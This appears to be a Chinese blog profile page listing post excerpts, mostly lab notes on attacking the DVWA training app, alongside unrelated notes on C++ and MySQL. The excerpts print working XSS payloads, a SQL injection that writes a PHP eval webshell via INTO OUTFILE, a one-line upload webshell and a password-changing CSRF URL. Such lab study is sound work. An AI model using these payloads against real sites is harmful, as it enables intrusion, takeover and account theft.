- 博客(21)
- 收藏
- 关注
原创 unordered_map第三个参数
https://c.biancheng.net/view/7231.html[unordered_map详解]默认哈希函数只适用于基本数据类型(包括 string 类型),而不适用于自定义的结构体或者类。
2023-11-20 09:58:37 235
原创 ERROR 2061 (HY000): Authentication plugin ‘caching_sha2_password
ERROR 2061 (HY000): Authentication plugin ‘caching_sha2_password
2023-11-09 15:58:32 1336
原创 dvwa之xss
dvwaxssreflectedlow #src地址错误,然后执行onerror的内容<img src=http://192.168.10.128/a.jpg οnerrοr=alert('xss4')> <body οnlοad=alert('xss2')>重定向语句<script>window.location='http://www.163.com'</script>获取cookie<script>alert
2021-03-07 10:43:59 197
原创 XSS挑战之旅
第一关无任何限制第二关<h1 align=center>欢迎来到level2</h1><h2 align=center>没有找到和<script>alert(1)</script>相关的结果.</h2><center><form action=level2.php method=GET><input name=keyword value="<..
2021-03-07 10:41:15 250
原创 sql注入dvwa
SQL injection%28 (%29 )%2c ,%23 # 写一句话木马?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 关于mysql注释的用法 (dvwa是mysql,post方式)low1' or '1' ='1
2021-03-07 10:39:52 3868
原创 dvwa之csrf
dvwa之csrflow1. 在新的页面中打开以下url,发现成功修改密码http://192.168.43.116/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#需要注意的是,CSRF最关键的是利用受害者的cookie向服务器发送伪造请求,所以如果受害者之前用Chrome浏览器登录的这个系统,而用搜狗浏览器点击这个链接,攻击是不会触发的,因为搜狗浏览器并不
2021-03-07 10:38:35 222
原创 javascript笔记
javascript笔记输出数据没有打印或者输出的函数window.alert() //弹出警告框innerHTML //写入到HTML元素document.write() //将内容写到HTML文档中.console.log() //写入到浏览器的控制台实例:1<p id ="hello">原段落</p><script>document.getElementById("hello").innerHTML="已经修改段落"</script&
2021-03-07 10:35:38 112
原创 文件上传
文件上传low一句话木马:<?php @eval($_POST['up']);?>菜刀连接的是上传的文件的目录,不是url!http://192.168.43.116/dvwa/hackable/uploads/hack.php源码 <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
2021-03-07 10:34:43 285
原创 sql注入(1)
sql注入分类数字型注入$id =$_GET['id'];$sql= "SELECT * FROM users WHERE id = $id LIMIT 0,1";$result = mysql_query($sql);$row = mysql_fetch($result);字符型注入$id =$_GET['id'];$sql= "SELECT * FROM users WHERE id = '$id' LIMIT 0,1";$result = mysql_query($sql);
2021-03-06 20:01:28 294
原创 2020-12-22
记javaweb考试忘掉的知识<%!String gettime(){Date date = new Date();StringDateFormat dateformat= new Simple DateFormat("yyyy-MM-dd HH:MM:SS");String day = dateformat. format(date);return day;}%>
2020-12-22 14:35:50 82
原创 dvwa搭建时一直403
搭建dvwa时页面一直403:1.解压dvwa—master文件夹——按其他教程里说的复制相关文件修改密码为root后2.改dvwa-master名字,改成dvwa3.复制这个文件夹到phpstudy安装路径下的www文件夹中4.浏览器地址栏 127.0.0.1/dvwa,可以访问了!...
2020-09-27 09:29:34 1874
原创 PHP的魔术常量
会根据它们使用的位置而改变,不区分大小写例如:FILE在哪个文件中使用,就代表哪个文件名称LINE在代码的哪行使用,就代表哪行的行号FUNCTION在哪个函数中使用,就代表哪个函数名METHOD在对象的哪个方法中使用,就代表这个方法名...
2020-09-25 10:46:38 81
原创 墨者靶场(三)sql字符注入
手工注入时,一直报错,评论中说在–后加+上网查到了原因:https://blog.csdn.net/weixin_43096078/article/details/108215076记录一下
2020-09-24 18:28:30 123
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人